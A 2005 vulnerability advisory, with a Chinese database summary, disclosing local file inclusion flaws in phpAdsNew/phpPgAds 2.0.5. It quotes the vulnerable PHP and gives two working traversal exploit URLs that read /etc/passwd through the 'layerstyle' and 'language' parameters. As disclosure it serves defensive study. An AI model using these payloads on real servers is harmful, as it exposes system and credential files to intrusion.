https://cxsecurity.com/issue/WLB-2005090046
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-260

phpAdsNew和phpPgAds2.0.6之前的版本中存在多个目录遍历漏洞。这使得远程攻击者可以借助于传递到adlayer.php的(1)layerstyle参数或传递到jsform.php的(2)language参数中的..(参数中包含’..’)包含任意文件。(dotdot)inthe(1)layerstyleparametertoadlayer.phpor(2)languageparametertojs-form.php.

[phpAdsNew/phpPgAds 2.0.5 Local file inclusion cXIb8O3.16]

Author: Maksymilian Arciemowicz (cXIb8O3)
from SECURITYREASON.COM TEAM

Date: 14.07.2005 (01:54 GMT+01.00)

- --- 0.Description ---
phpAdsNew is an open-source ad server, with an integrated banner management interface and tracking system for gathering
statistics. With phpAdsNew you can easily rotate paid banners and your own in-house advertisements. You can even
integrate banners from third party advertising companies.

- --- 1. Local file inclusion ---
In phpAdsNew and phpPgAds 2.0.5 exists two bugs. First bug exist in adlayer.php.

Code:
- -151-153---
phpAds_registerGlobal ('what', 'clientid', 'clientID', 'context',
'target', 'source', 'withtext', 'withText',
'layerstyle');
- -151-153---

and

- -178-182---
if (!isset($layerstyle) || empty($layerstyle)) $layerstyle = 'geocities';


// Include layerstyle
require(phpAds_path.'/libraries/layerstyles/'.$layerstyle.'/layerstyle.inc.php');
- -178-182---

Varible $layerstyle isn't filtered and you can try to include local file.


For example error:

http://[HOST]/[DIR]/adlayer.php?layerstyle=cxsecurity.com

and you can see error like this:

- ---
<br />
<b>Warning</b>: main(): Unable to access ./libraries/layerstyles/cxsecurity.com/layerstyle.inc.php in
<b>/www/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
<br />
<b>Warning</b>: main(./libraries/layerstyles/cxsecurity.com/layerstyle.inc.php): failed to open stream: No
such file or directory in <b>/www/phpadsnew-2.0.5/phpadsnew-2.0.5/adlayer.php</b> on line
<b>181</b><br />
<br />
<b>Fatal error</b>: main(): Failed opening required
'./libraries/layerstyles/cxsecurity.com/layerstyle.inc.php' (include_path='.:') in
<b>/www/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
- ---

Exploit:
http://[HOST]/[DIR]/adlayer.php?layerstyle=../../../../../../../etc/passwd%00

Magic_quotes must be OFF .

Next problem exist in ./admin/js-form.php

Code:
- -26-28---
@include (phpAds_path.'/language/english/default.lang.php');
if ($HTTP_GET_VARS['language'] != 'english' &&
file_exists(phpAds_path.'/language/'.$HTTP_GET_VARS['language'].'/default.lang.php'))
@include (phpAds_path.'/language/'.$HTTP_GET_VARS['language'].'/default.lang.php');
- -26-28---

And if magic_quotes_gpc = Off, you can do attack.
Exploit:

http://[HOST]/[DIR]/admin/js-form.php?language=../../../../../../../../../../etc/passwd%00

but here you don't see any error because first is function file_exists.

- --- 3. How to fix ---

Download the new version of the script.

- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >

来源:XF
名称:phppgads-multiple-file-include(21880)
链接:http://xforce.iss.net/xforce/xfdb/21880
来源:BID
名称:14584
链接:http://www.securityfocus.com/bid/14584
来源:BUGTRAQ
名称:20050817[PHPADSNEW-SA-2005-001]phpAdsNewandphpPgAds2.0.6fixmultiplevulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112431497300344&w;=2
来源:MISC
链接:http://www.securityreason.com/adv/phpAdsnew.SR.16.asc
来源:SECUNIA
名称:16469
链接:http://secunia.com/advisories/16469/